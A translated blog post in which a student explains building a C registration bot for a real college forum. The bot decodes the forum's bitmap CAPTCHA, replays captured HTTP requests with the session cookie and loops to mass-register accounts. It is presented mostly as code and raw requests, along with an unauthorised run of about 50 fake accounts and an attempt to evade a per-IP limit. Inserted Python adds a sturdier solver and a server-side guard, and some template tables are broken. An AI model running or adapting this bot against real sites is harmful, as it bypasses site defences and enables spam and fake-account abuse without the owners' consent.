I recently learned the HTTP protocol and found that I could write a program to simulate user registration, posting and so on !! I searched the internet and found that this kind of program is called a web registration bot: users get registered like crazy, and even advertising posts get published, all done directly by a program. In essence it is the same as a browser submitting the registration form.
Well, I'll write one. I found that the hardest part of such a registration bot is cracking the CAPTCHA. Forget it, a newbie like me will just find a website without a CAPTCHA! So I went to our school forum and saw that no CAPTCHA was needed for registration. All right, done! (Later I found this forum really annoying.) The school forum was written in PHP. I captured packets to analyse my own registration and then simulated the registration process, but in the end it failed !!! Finally I found that it was related to the information in the cookie. Let's see what cookies it sent me:
Set-Cookie: np6q_2132_sid=33grgh; expires=Wed, 09-May-2012 12:55:47 GMT; path=/
Set-Cookie: np6q_2132_lastact=1336481747%09member.php%09register; expires=Wed, 09-May-2012 12:55:47 GMT; path=/
Set-Cookie: np6q_2132_cloudstatpost=deleted; expires=Mon, 09-May-2011 12:55:46 GMT; path=/
Set-Cookie: np6q_2132_sid=33grgh; expires=Wed, 09-May-2012 12:55:47 GMT; path=/
There are a bunch of other cookies. I analysed these cookies for a long time and changed a lot of key values, but it still didn't work. I don't know whether the path or the format was wrong. I disabled cookies and registered with a browser, and still could not understand this cookie; on top of that, this forum only allows one registration from the same IP address within three hours !! I tried using a proxy, but it still told me to come back and register three hours later. I cried at the time. I gave up on that one !!
After the first failure I still had a lot of enthusiasm, so I kept going. Let's look at other schools' forums ~~~ So I came to the South China University of Technology forum. Damn, it had nasty CAPTCHAs and verification questions.
Forget it. This is not something a human can do. If engineering colleges are like this, find a liberal arts college !! So I found the forum of a college in Guangdong, written in ASP. The forum was deserted and up for sale; whois showed the domain expires in 2013.
Let's look at the CAPTCHA on its registration page:
This CAPTCHA is about as simple as they come.
Capture the packets and analyse the CAPTCHA file. Download code.asp, rename it to .bmp, open it in WinHex, and spend a long time working out the binary layout of the BMP file.
In the end I found that bytes 0-53 (decimal) are the BMP file header and the image data starts at byte 54. Every three bytes is one pixel, and the CAPTCHA bitmap is 40*10, so the image data runs from byte 54 to 1253, each digit takes 300 bytes, and the image is stored starting from the last row. Once you know this, it is easy to crack.
After receiving the CAPTCHA image, it is converted to black and white.
Then it is simplified: since every 3 bytes is one pixel, I store each pixel as a 0 or 1 in one byte of a two-dimensional array.
typedef struct number {
    char num[10][10];
} Num;
Then I wrote another program to get the 10*10 representation of each digit 0-9:
// 0
,
,
,
,
,
,
,
,
,
,
// 1
1, 1, 1, 1, 1, 1, 1, 1,
,
1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1,
,
// 2
,
,
,
,
,
,
1, 1, 1, 1, 1, 1, 1, 1,
,
0, 1, 1, 1, 1, 1, 1, 1,
,
......
Convert the received CAPTCHA image to the same format and compare it against these templates to find which digit it is. The basic code is as follows:
// Assumed globals used below (they are referenced but not shown in the post):
// Num dealNum[4], Wu[10]; int securityCode[4]; int check(Num *a, Num *b);
void getCode(char *buff, int recvSize) {
    unsigned char *p, *pnum, *pbase;
    int board, flag = 0, i, j;
    int h, l, n;                          // row, column, digit index
    char mapBuff[40 * 10];
    p = (unsigned char *)buff;
    // the chunk-size line "4e6\r\n" is the boundary; everything after it is the image file
    for (board = 1; board + 4 <= recvSize; board++) {
        if ((*p == '4') && (*(p + 1) == 'e') && (*(p + 2) == '6') && (*(p + 3) == 0x0d) && (*(p + 4) == 0x0a)) {
            p = p + 5;
            flag = 1;
            break;
        }
        p++;
    }
    if (!flag) return;
    // skip the 54-byte BMP header to reach the first pixel
    pnum = p + 54;
    pbase = pnum;
    for (i = 0; i < 40 * 10 * 3; i++) {   // binarise the 1200 pixel bytes only, so the loop stays inside the image
        if (*pnum == 0xEE) *pnum = 0xff; else *pnum = 0x0;
        pnum++;
    }
    pnum = pbase;
    for (i = 0; i < 400; i++) {           // simplify the image to 1/0 and store it in mapBuff
        if (*pnum == 0xff) mapBuff[i] = 1; else mapBuff[i] = 0;
        pnum += 3;
    }
    for (i = 0; i < 400; i++) {           // place each pixel into dealNum
        n = i % 40 / 10;                  // which digit
        l = i % 40 % 10;                  // column
        h = 9 - i / 40;                   // row (the bitmap is stored bottom-up)
        dealNum[n].num[h][l] = mapBuff[i];
    }
    for (i = 0; i < 4; i++) {
        for (j = 0; j < 10; j++) {
            if (check(&dealNum[i], &Wu[j])) {
                securityCode[i] = j;      // save the recognised digit (final result)
                break;
            }
        }
    }
    /* FILE *fp; fp = fopen("D:/1.bmp", "wb"); fwrite(p, 1, recvSize - board - 4 - 7, fp); fclose(fp); */
}
Tested, and it works.
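As an added example (my own code, not the post's), here is the same decoding step in Python done the way a practitioner would check it: a real chunked-body decoder instead of searching for the literal "4e6\r\n", a BMP reader that takes the pixel offset, width and height from the header and honours the bottom-up row order and 4-byte row padding, and the tile comparison. The glyph templates and make_bmp are constructed for the test and are not the post's digit tables.

```python
import struct

def dechunk(body):
    """HTTP chunked body -> payload. The post hard-codes the single chunk line '4e6\\r\\n':
    0x4e6 = 1254 = 54-byte BMP header + 40*10 pixels * 3 bytes, so its two descriptions agree."""
    out, pos = bytearray(), 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)   # hex size; a chunk extension after ';' is ignored
        if size == 0:
            return bytes(out)
        out += body[end + 2:end + 2 + size]
        pos = end + 2 + size + 2                         # skip the data and its trailing CRLF

def bmp_to_grid(bmp):
    """Rows (top to bottom) of 0/1 for an uncompressed 24-bit BMP, reading the header instead of assuming it."""
    if bmp[:2] != b"BM":
        raise ValueError("not a BMP file")
    off = struct.unpack_from("<I", bmp, 10)[0]           # bfOffBits: start of pixel data (54 here)
    w, h, _planes, _bpp = struct.unpack_from("<iiHH", bmp, 18)
    stride = (w * 3 + 3) & ~3                            # rows are padded to 4 bytes (120 for w=40: no padding)
    rows = [[1 if sum(bmp[off + r * stride + 3 * x:off + r * stride + 3 * x + 3]) < 384 else 0  # dark = ink
             for x in range(w)] for r in range(abs(h))]
    return rows if h < 0 else rows[::-1]                 # positive height: rows are stored bottom-up

def split_digits(grid, n=4, size=10):
    """Slice the 40x10 grid into four 10x10 tiles, left to right (the post's dealNum[4])."""
    return [[row[d * size:(d + 1) * size] for row in grid] for d in range(n)]

def match_tile(tile, templates):
    """Label of the template with the fewest differing pixels (the post requires an exact match)."""
    def diff(t):
        return sum(a != b for ra, rb in zip(tile, t) for a, b in zip(ra, rb))
    return min(templates, key=lambda k: diff(templates[k]))

def make_bmp(grid):
    """Constructed test input: encode a 0/1 grid as a bottom-up 24-bit BMP, the way code.asp would."""
    w, h = len(grid[0]), len(grid)
    pad = b"\0" * (((w * 3 + 3) & ~3) - w * 3)
    pixels = b"".join(b"".join(b"\0\0\0" if v else b"\xff\xff\xff" for v in row) + pad for row in reversed(grid))
    hdr = b"BM" + struct.pack("<IHHI", 54 + len(pixels), 0, 0, 54)                   # BITMAPFILEHEADER
    hdr += struct.pack("<IiiHHIIiiII", 40, w, h, 1, 24, 0, len(pixels), 0, 0, 0, 0)  # BITMAPINFOHEADER
    return hdr + pixels

# Constructed glyphs, not the post's templates: "1" a vertical bar, "0" a hollow box, "7" a bar with a top stroke.
TEMPLATES = {"1": [[int(x == 5) for x in range(10)] for y in range(10)],
             "0": [[int(x in (2, 7) or y in (1, 8)) for x in range(10)] for y in range(10)],
             "7": [[int(y == 0 or x == 7) for x in range(10)] for y in range(10)]}

def solve(chunked_body, templates=TEMPLATES):
    return "".join(match_tile(t, templates) for t in split_digits(bmp_to_grid(dechunk(chunked_body))))
```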
Once the CAPTCHA is done, nothing else is difficult. Register an account with a browser and capture the traffic with a packet capture tool. The request headers look roughly like this:
Request for the registration page:
GET /reg.asp?action=agree HTTP/1.1
Host: [not shown].com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: zym6kbbs1=styleid=freshblue; tempcontent=; ajstat_ok_pages=4; ajstat_ok_times=3
Server response:
HTTP/1.1 200 OK
Cache-control: private
Date: Wed, 09 May 2012 15:46:58 GMT
Content-Length: 4521
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: aspsessionidsqaraqdc=inlpkmdbmjemkdndfilpehjm; path=/
... a lot of HTML for the page ...
At this point the server has given me a session id, "aspsessionidsqaraqdc=inlpkmdbmjemkdndfilpehjm"; save it.
Then send a request to fetch the CAPTCHA:
GET /code.asp HTTP/1.1
Host: [not shown].com
Connection: keep-alive
Referer: http://xhyes.com/reg.asp?action=agree
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: zym6kbbs1=styleid=freshblue; tempcontent=; ajstat_ok_pages=4; ajstat_ok_times=3; aspsessionidsqaraqdc=inlpkmdbmjemkdndfilpehjm
Note that the CAPTCHA request must carry the session id the server just issued: the server binds the CAPTCHA it is about to return to that session id, so the answer submitted later can be checked against the right session.
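As an added illustration of what that binding looks like from the server's side (my own sketch, not the forum's code): the expected digits are stored against the session that fetched the image, and the registration handler checks them. The single-use and expiry rules are my assumptions about how such a check is written; the one-registration-per-IP-per-three-hours limit is the rule the first forum enforced.

```python
import secrets
import time

REG_WINDOW = 3 * 60 * 60   # the first forum's rule: one registration per IP address every three hours

class RegistrationGuard:
    """Session-bound, single-use CAPTCHA plus a per-IP registration limit (sketch, not the forum's code)."""
    def __init__(self, clock=time.time):
        self.clock = clock
        self.sessions = {}   # session id -> (expected digits, time issued) or None when nothing is pending
        self.last_reg = {}   # client IP -> time of its last successful registration

    def new_session(self):
        """Like the first GET /reg.asp: hand out an unguessable session id (Set-Cookie)."""
        sid = secrets.token_hex(12)
        self.sessions[sid] = None
        return sid

    def issue_captcha(self, sid):
        """Like GET /code.asp: pick four digits for this session; a fresh request replaces the old answer."""
        if sid not in self.sessions:
            raise KeyError("unknown session")
        answer = "".join(secrets.choice("0123456789") for _ in range(4))
        self.sessions[sid] = (answer, self.clock())
        return answer   # the real server renders this as the bitmap; only the image leaves the server

    def register(self, sid, ip, answer, ttl=120):
        """Like POST /reg.asp?action=save. Returns a short status instead of the forum's HTML page."""
        state = self.sessions.get(sid)
        if state is None:
            return "no captcha issued for this session"
        expected, issued = state
        self.sessions[sid] = None          # single use: replaying the same digits with this session fails
        if self.clock() - issued > ttl:
            return "captcha expired"
        if not secrets.compare_digest(answer, expected):
            return "wrong captcha"
        last = self.last_reg.get(ip)
        if last is not None and self.clock() - last < REG_WINDOW:
            return "one registration per IP every three hours"
        self.last_reg[ip] = self.clock()
        return "registered"
```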
The server returns the CAPTCHA bitmap image:
HTTP/1.1 200 OK
Cache-control: private
Date: Wed, 09 May 2012 15:46:58 GMT
Pragma: no-cache
Transfer-Encoding: chunked
Content-Type: image/bmp
Expires: Wed, 09 May 2012 15:45:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: no-cache
4e6
BM... (binary BMP data; the chunk size 0x4e6 is 1254 bytes, i.e. the 54-byte header plus 40*10*3 bytes of pixels)
... the rest of the image data ...
Then decode the received CAPTCHA image with the method above to get the digits. At the same time, put the session id obtained above into the Cookie header of the registration request, and write the recognised digits into the adminid form field:
sprintf(postData, "name=helloworld%d&sex=1&password=123456&repassword=123456&email=sflsfsk@0sll.com&adminid=%d%d%d%d", nameNum, securityCode[0], securityCode[1], securityCode[2], securityCode[3]);
Then send all of this to the server, and the registration succeeds !!!
POST /reg.asp?action=save HTTP/1.1
Host: xhyes.com
Connection: keep-alive
Referer: http://xhyes.com/reg.asp?action=agree
Content-Length: 165
Cache-Control: max-age=0
Origin: http://xhyes.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: zym6kbbs1=styleid=freshblue; tempcontent=; aspsessionidsqaraqdc=inlpkmdbmjemkdndfilpehjm; ajstat_ok_pages=5; ajstat_ok_times=3
name=helloworld1001&sex=1&password=123456&repassword=123456&email=sflsfsk@0sll.com&adminid=1036
The server returns the "registration successful" page:
HTTP/1.1 200 OK
Cache-control: private
Date: Wed, 09 May 2012 15:48:04 GMT
Content-Length: 2006
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
... a lot of HTML ...
which contains the following:
"</div><div class=infobody>Congratulations! <b>helloworld1001</b> has been registered successfully.<br>· <a href=lo............"
Success !!
The following is the main program block:
// Start registering ~~
for (i = 0; lichking < regNum; i++, nameNum++) {
    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    connect(sock, (sockaddr *)&desAddr, len);
    // request the registration page to obtain the session id
    initPage();
    makeHttpPageHdr();
    send(sock, sendBuff, strlen(sendBuff), 0);
    size = recv(sock, recvBuff, sizeof(recvBuff), 0);
    getSessionId(recvBuff, size);            // extract the session id from the response
    closesocket(sock);
    // build the CAPTCHA request header
    initCode();
    makeHttpCodeHdr();
    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    connect(sock, (sockaddr *)&desAddr, len);
    // start decoding the CAPTCHA
    send(sock, sendBuff, strlen(sendBuff), 0);   // send the CAPTCHA image request
    size = recv(sock, recvBuff, sizeof(recvBuff), 0);
    closesocket(sock);
    getCode(recvBuff, size);                 // recognise the four digits
    printf("%s\n", sessionId);
    // printf("%s\n", recvBuff);
    printf("%d%d%d%d\n", securityCode[0], securityCode[1], securityCode[2], securityCode[3]);
    // start registering
    Sleep(1000);
    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    connect(sock, (sockaddr *)&desAddr, len);
    int error = GetLastError();
    initReg();
    makeHttpRegHdr();
    send(sock, sendBuff, strlen(sendBuff), 0);               // send the registration request header
    send(sock, reg.string[0], strlen(reg.string[0]), 0);     // send the form body
    size = recv(sock, recvBuff, sizeof(recvBuff), 0);
    closesocket(sock);
    Sleep(500);
}
That is how the program works. Let's take a look at it in action !!
The string of letters is the session id, and the four digits are the decoded CAPTCHA.
This is the site's member count: it was 1018 at the time. I think that was because the administrator had sent out an announcement, since I only got onto the site yesterday, the 9th. Haha ~~
This is the member count after my test. I only registered about 50 accounts, purely for learning; registering 1000 or 10000 would work just as well ~~ but this site responds slowly, so it would take a long time. I guess the database is Access.
Announcement:
Thanks to Google and Bing; it finally worked and I am very happy. I have never been this happy !!! Hahaha
You could say this program is the first thing of some value I have written after so many useless programs (I think) !!! Aren't you happy ?! Aren't you excited ??
But at my level I can only handle those ASP sites; others are beyond me ~ At the same time, I should pay more attention to security issues when programming.
Done ~~~~